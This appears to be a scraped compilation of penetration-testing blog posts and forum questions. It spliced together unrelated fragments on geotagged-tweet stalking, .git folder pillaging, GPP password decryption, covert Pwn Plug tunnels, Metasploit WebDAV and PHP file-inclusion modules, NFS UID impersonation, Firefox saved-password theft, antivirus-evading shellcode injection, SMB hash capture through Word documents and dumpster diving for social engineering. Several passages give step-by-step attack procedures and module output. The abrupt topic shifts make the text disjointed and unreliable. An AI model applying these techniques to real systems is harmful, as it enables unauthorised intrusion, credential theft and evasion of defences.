Geo/Social stalking is fun. Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let's start with somewhere fun, like the pentagon, and see who's tweeting around there

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the twitter maps app, it loads recent geo-tagged tweets

Worth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php/** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information by * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */

// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define('DB_NAME', 'site_wordpress');

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:

We've mostly utilized the 3G out of band functionality, this allows us to more easily bridge that gap between physical and electronic attack. Either way its been great and definitely a value add for us.

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:

SSH over any TCP port

SSH over HTTP requests (appears as standard HTTP traffic)

SSH over SSL (appears as HTTPS)

SSH over DNS queries (appears as DNS traffic)

SSH over ICMP (appears as outbound pings)

SSH over ICMP (appears as outbound pings)

SSH Egress Buster (top 10 common egress ports)

Out-of-band SSH over 3G/GSM cellular (Elite models)

yak yak, lets see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

Its pretty straightforward and the documentation the pwnie express guys provide will get you up and running with whatever tunnel method you choose.

ok now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in. sorry kinda blurry, couldnt go back and take another ;-/Final placement behind some boxes where it hung out for a few days.

The current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).

The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.

msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS txt yes The list of extensions to generate LOCALEXE false yes Use a local exe instead of generating one based on payload options LOCALFILE myexe.exe yes The filename to serve up LOCALROOT /tmp/ yes The local file path SHARENAME documents yes The name of the top-level share. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / yes The URI to use (do not change).

[*] Exploit running as background job.[*] Started reverse handler on 192.168.26.129:5555[*][*] Exploit links are now available at \\192.168.26.129\documents\[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.26.129:80/[*] Server started.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.

I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.

You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)Setting the payload spotsSo if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this in depth, so i'll stop explaining all that unless people ask for it).

Our list of usernamesOnce that is set up, you can play with timing options from the options tab. This will adjust number of threads and how long to wait in between requests.Timing optionsYou may also want to send everything through tor. Check the Burp main options tab.-CG

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.http://www.dotnetperls.com/trace

Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.

Low? currently an "info" with Nessus 5Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share use the following after first creating a directory on your local machine:[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badpermschange directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1to abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the shareumount /local_dir

create a user called daveuseradd davepasswd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directorycd dave

issue the commandsu dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the slides) videowhite paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server. *Dirbusting and ruby FTW*

I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.

Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is

Against mis-configured servers

Against domain controllers to pull info

Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?This can be useful to find:

Lists of applications

Recent URL's accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun let's seeLooking at the list of applications list one that doesnt look normal (zecmd)Following that down leads us to zecmd.jsp that is a jsp shellIf you are interested in zecmd.jsp and jboss worm it comes from --> this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdfthoughts?-CG

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":

Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92+ - Port http (80/tcp) is open [i] Plugin ID 38157 Synopsis : The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary. There are two public options I have found; shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:1. could your pentest shop emulate an attacker of the level in the case studies. 2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:

Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).

Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.

Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.

I am busy testing a system and Nessus reports that it is possible to exploit it and from the Nessus output it seems like Nessus was successful, see below. However, I cannot find any information anywhere on how to manually produce this vulnerability. Do not confuse it with the horde of other telnet vulnerabilities out there.

I thought it would be as simple is some of the old telnet environment variable vulnerabilities e.g. telnet -l '-fbin' systemx.com but it does not seem to work, any ideas?

Kerberos telnet Crafted Username Remote Authentication Bypass

Synopsis:
It is possible to log into the remote system using telnet without supplying any credentials

Description:
The remote version of kerberos telnet does not sanitize the user-supplied 'USER' environement variable. By supplying a specially malformed USER environment variable, an attacker may force the remote telnet server to believe that the user has already authenticated.

Risk factor:
High

CVSS Base Score:7.6
CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C

Solution:
Apply the patch below or contact your vendor for a patch :

Plugin output:
It was possible to log in and execute "id" : ];root@systemx:~ [root@systemx ~]# uid=

I had read about the following
1)honey-pots(low interaction and high interaction honey-pots)
2)honey-nets(network of honey-pot's)
3)honey-walls!!(combination of honey-pot + firewall +router +gateway)

I had downloaded some low interaction honeypot system and used it,But i didn't know how can i set-up honey nets or honey-walls
and it's configuration etc..
did you guys have any experience with honey-nets and honey walls and high interaction honey-pots?
If yes can any body tell me where can i learn about them?

and also i heared it is hars for the attackers to detect a honey-wall,because it act as a multi purpose device,So according to me they can not detect it easily ..

I tried on google i ended up with only theory,so decided to ask here...
Hope i will get some ideas here...

Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.

So how to do it?

Actually its simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:

key3.dbsignons.sqlite

If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.

I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...

In the millennium series by stiegg larsson, a talented pc user named WASP designs and implements an app named asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute or a single event.

The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?

Getting back to the point though-does anyone have insight into this idea?

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

Basic options:Name Current Setting Required Description---- --------------- -------- -----------PATH / yes The base directory to prepend to the URL to tryPHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URLPHPURI no The URI to request, with the include parameter changed to XXpathXXProxies no Use a proxy chainRHOST yes The target addressRPORT 80 yes The target portSRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)URIPATH no The URI to use for this exploit (default is random)VHOST no HTTP server virtual host

Payload information:Space: 32768

Description:This module can be used to exploit any generic PHP file includevulnerability, where the application includes code like thefollowing:

Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.

If you are using the one bundled with your distro you are probably missing out some of the more interesting and new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

Its been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organization's send all (or some)web traffic through.

It also handy that you can throw it some switches to show the AS and network routes with the scan as well.

i tried to encode it with some crypters but it doesn't work,
so i tried to recompile the source but avira get it every time...then i discover that avira detect the call listen() in the code of metsvc and then mark it as a backdoor!

Does anyone know of a freely available pcap "attack library" which could be run through TCPreplay? Specifically, I'd like the ability to select either specific individual or multiple-simultaneous attacks and send those attacks down the wire.

I've run some searches but haven't come up with anything yet---thought I would post here before I start building it out myself.

I'm having a problem updating it
It says "Error: rsync failed. Your NVT collection might be broken now."
Firewall? ..I'm using a domain for downloads, and that's blocking me.. How can i define the proxy in the Konsole, like I had to do on Firefox?

In a PEnTest Scenario we have found a open port for for "3306/tcp open mysql port unauthorized" service .
How we can try to connect it remotely.What more further information we can gain using this information

hello all
i am trying to get remote access to my main computer on my network using the set email attack.
however when i open the pdf i do not get command line access!
see below:
thanks in advance for the advice
yoma

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

Note: I haven't made 15 posts yet so the pictures can be found in the distorted URLs.

There is no such thing as irrelevant information ~ Muts

During the information gathering stage (if possible) I visit the target for some reconnaissance work in a process that involves exploration and inference. In this case I examined a telecommunications centre which houses a base transceiver station(cell site) and a virtual switchboard. All of this was done with permission. This is a simple overview of my methodology and the purpose of it is to demonstrate how trifles can turn out to be useful pieces of information.

I usually put on clothes which give me the air of a vagrant but I don't exaggerate it. I'll wear a cheap rain jacket, torn jeans, a hood and I'll remove my glasses and mess up my goatee beard. This will avail against prying eyes since I'll just look like a bum rummaging the garbage for recyclable materials and/or food. Why is this important? because I don't want to produce the impression of an document/identity thief.

Garbage

Even in the days of the paper shredder it's very likely you'll find whole documents, letters and all sorts of memorandums. From this we can collect names of employees and customers, phone numbers, email addresses, material on office routines, schedules and so on and so forth. I addition to useful info I can also deduce recent activities. Let's take a look.

h ttp://i41.tinypic.com/k51nao.jpg

Note the abundance of twisted pair cabling that is on top; could this be just old wires? or perhaps a change in equipment?

Lying below the bag of wiring on the left side I found a box--- on it is an address of a seller and manufacturer of computer equipment and in addition on the post label there is a content description stating "modular connectors". From this I can deduce that they have indeed been improving their network and this could be fodder for a social engineering attack.

h ttp://i44.tinypic.com/2rdztjc.jpg

And finally paper, white gold. I always stress my search for crumpled and/or torn notes.
From all this I found the following:
9 Employee names
More assorted names and phone numbers to count. Customers perhaps?
3 work schedules
A paper with the IPs of local hosts scribbled on them, as well as other connection config info.
A document with electronic consumption measurements.
An employment application.
A crumpled post-it-note with a username and password from a web-app of their site.
An internal "staff only" URL

h ttp://i43.tinypic.com/14nzjte.jpg

The Building

I have an eye open for aberrations, I view this as fodder for social engineering attacks. I also peek inside for anything that could be of use.

h ttp://i39.tinypic.com/s4wi9f.jpg

Trouble with your antenna? Here I'm allowed to draw the conclusion that their TV reception is poor. This could be useful fodder for an SE attack; I could ascertain who's behind their TV service and impersonate a service rep stating that he detects that their television converter box or set-top box is receiving a sub-par signal and thus send them an email containing guidelines on improving their signal. This email could be a vehicle for a backdoor payload or contain links to sham sites on improving the signal or maybe even a manual of whatever set-top unit they are using. Remember, being elaborate is a key element.

h ttp://i43.tinypic.com/8zpahg.jpg

May not be clear on photo but they are all running Win XP Pro. Earlier that evening I saw that the monitor at the anterior was displaying the latest version of Internet Explorer and MSN messenger.

h ttp://i44.tinypic.com/140ygi1.jpg

Now I know who is providing security.

h ttp://i42.tinypic.com/35d2rmb.jpg

Hmm... vandalism? maybe they are not doing such a good job. Here I can make a telephone call or send a sham email from a competing security guard services provider or maybe even send an email from Securitas themselves and use the vandalism examples as a basis for a proposition for increased patrolling and in the process implement an attack similar to the one with the antenna problem.

h ttp://i42.tinypic.com/9idyk4.jpg

The lights are turned on at 3:00 in the morning?
Nice, a whiteboard. Here I learnt important topics which are evidently under discussion at this business. In this case they were looking for buyers for a telephone directory service. This is something which I could avail myself of, such as shammed interest in this product as a pretext to gain more info or maybe even access(which I eventually did).

Conclusion

In just 30 minutes I acquired a good chunk of information without any key strokes, which aided me very well latter on in the attack. I am happy to announce that I successfully penetrated several computers at this company using mostly what I observed on the physical site. I did proposed to them the following solutions:
1. Use paper shredders
2. Turn your damn lights off.
3. Be more circumspect with phonecalls and emails pertaining to problems visible from the outside.

If you live in the same or an adjacent city you could give this a try. It's quite a thrill.

I have a client with an older Fedora box. They allow external connections via the built in remote desktop sharing (vino-server). I've been asked to audit the vnc connections to the box for the past 3 months.

I didn't set up the machine so I'm not sure what options have been set up for logging. Does anyone know if there are any default vnc logs or where I can start looking for connection logs to port 5900?

Hey guys, i have seen lots of documents about how to hack and ive tried many exploits on my test server (hp proliant dl380g3 i got off ebay :D). But ive never tryed rooting it before :S i looked around google but only found outdated papers from the 90s lol. i have seen webshells like c99 and r57, with options like "connect back" and "bind shell". Ive looked into it and found that for "connect back" you have to portfoward if it a remote host connecting to you, but not if its a lan. "Bind shell" is me doing "nc <ip> <port>", which is usually blocked by firewalls?

so people say "connect back" shell are the best but dont they show your ip address? also ive heard of data pipe shells which has something to do with irc?

Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.

I used all the dictionaries i could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.

Through some social engineering, and after a few pints of lager, i tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:

After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.

Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundreds of years) ???

Hello, I posted this in the OffSec PWB forum, but I don't think it's frequented that often hence no response. Apologies for the re-post if you've already come across this.

I've been doing some research into tcp wrappers recently, having noticed that a few services within the pwb lab are wrapped. As I understand it tcpwrappers are a method of applying an ACL to a service, based on IP address.

I've figured that I can only talk to wrapped services if i'm bouncing through another host, but is there a reliable way of determining which hosts are in the ACL? The only ideas i've had on this so far seem to require some cache poisoning, which seems more than likely to mess things up (and poisoning is not allowed in the labs anyway!).

Spoofing my source address could be an option I suppose, but that would mean responses are directed elsewhere I guess...

Can anyone share any insights into this? Even a nudge in the right direction would be appreciated.

Hello all,
So a professor of my Computer Security course, together with the campus IT director, have offered my class a challenge. They've placed a file (aptly named secret.txt) with a secret word/phrase/something in a protected folder, and are offering extra credit if we can figure out what that word is. We aren't allowed to destroy anything or inhibit use of the server to other students, but past that anything (sans physical coercion and blackmail) goes.

The server is running SunOS 5.9. The folder, and all files within it that I know of, have 700 permissions, and both accounts I have access to are in the students group, whereas he's in the faculty group. We can print the shadowed /etc/passwd, but permission is denied to read or copy /etc/shadow.

We'll get credit whether we get caught or not, but ideas that get the secret word without alerting anybody are preferable. I'm familiar with unix/linux, but not so much with penetrating it. I come to you asking for advice and guidance in things to learn about that would aid me in this endeavor.

i know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine. i know nmap is good for finding ports but what is the method everyone uses to know what exploit to choose that will comply. i am running boxs with win xp sp2 and sp3 and my host with bt4 final.

i need help. i am searching a tool that could list all subdomains for a target domain :confused: ex : .edu.* , i would like to collect all subdomains of this target for example i tried goorecon but it result only 60 subdomains for my target :rolleyes: at the other hand when searching manually through google i found 200 subdomains

Hi, I am doing some Pentesting at school with full permission of the target and the school. I am trying to either exploit it or use social engineering. I would prefer to try and exploit it because that would be more immediate. I looked in the exploit database but did not find an exploit. If either you can point me to an exploit in the database or some other form of exploit I would appreciate it. MITM is an option but I would prefer not to do that as I do not want to try it on a production network even though I am allowed to.

so ive been working with metasploit on normal internal networks at home. Everything works great there. Now ive wanted to go to the next level and see how everything works on a domain. So ive set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using meterpreter. etc etc. So till now everything was jolly. Now when i try to take over the root account or system of the computer that ive exploited i cant migrate to the system. I think it has something to do with the fact the im logged onto the server and not the local account. Any idea on how to compromise the local account? Or even better the server that the computer is logged into?

I have tried to use windows/browser/ie_aurora.
My internet connection is by a router, so my public IP address is different from the local one.
So when I use ie_aurora it works fine if I use 192.168.1.104 (local intranet address) but if I use my public address like 82.34.XXX.XXX as SRVHOST and LHOST:

During a recent discussion with co-workers over lunch, the topic of offensive security came up. Preferring offensive security over anything else, I chimed in and explained the glorious difference study, and skill development methods between offensive and defensive security ideologies.

Offensive security and everything it encapsulates can be seen as a sport. There are techniques, tricks, methods, styles, different platforms, etc. all at your disposal to use to your liking. Youre taking your keyboard, and turning it into a controller that can potentially do as much damage as you allow yourself to learn. Offensive security can be practiced. You can even increase the speed in which you attack. The list goes on.

Defensive security is boring. Its preventive. Write your policies, set up your controls, audit, report. ZZZZZ. Is this what I got into security for? No. Hardly. Not even close in fact. Anyway

It came to mind that if offensive security can be considered a sport, why not train like an athlete. Yes, its good to know the general concepts, tools, and how to use them, but how is that really effective in todays fast paced cyber-terrorism world? If youre not trained to detect, react, and attack appropriately, youre bound to become useless. The combination of both knowledge and disciplined ability will be invaluable.

I would imagine that a training curriculum for offensive security could take the security skills you already have, and hone them into militant abilities and at the same time, teach new methods. Not only would there be a program to follow for disciplined learning, but common offensive security tasks as well as attacks would become so ingrained into an individual, they would never have to stop, hesitate, or look up a procedure that was merely foggy or forgotten.

Right, im doing a little pentest on my AP which uses WPA-PSK.
I used my netbook to run BT4 then I successfully de-auth my targeted workstation (my desktop using wifi) and captured the 4-way handshake into a capture file.
I then used the default aircrack word list (password.lst) to try and crack the handshake.

I then get KEY FOUND [ penelope]
I assume this means all it good and its been cracked, However I know this is not the password as its set to "Chronicles2"

Yet doing another capture file from my same bssid and aircrack still tells me this is the key.

why does aircrack tell me this is the key?
thanks.
I do have permission to crack the WPA passcode as I own the network, pay the bill and set up the AP. Just incase anyone asks =]

Since I have the server and backups I would have access to NTDS.DIT file, is there away to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.

I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.

Just wondering if anyone has done this before, or if it is even possible to double up pivots.

Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for linux anyone? :rolleyes:

hi
I Hope this is the right place to ask this.
When I use Metasploit its work very good on my local network
but when i want to pentest out of my local it doesnt work:confused:
can some one tell me why?

First let me say, yes I know this isn't a nmap support forum and that if nobody here knows the answer to my question I will go ask on a nmap mailing list or something.

To the point. I'm wondering if anyone knows the scope of NMAP NSE scripts? Are they always associated with a port or are there host level NSEs as well. Think of this from the perspective of parsing NMAP XML output.

Personally I've only seen NSE output related to a port but that doesn't meant that there isn't a host level NSE output that I just haven't managed to trigger yet.

I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.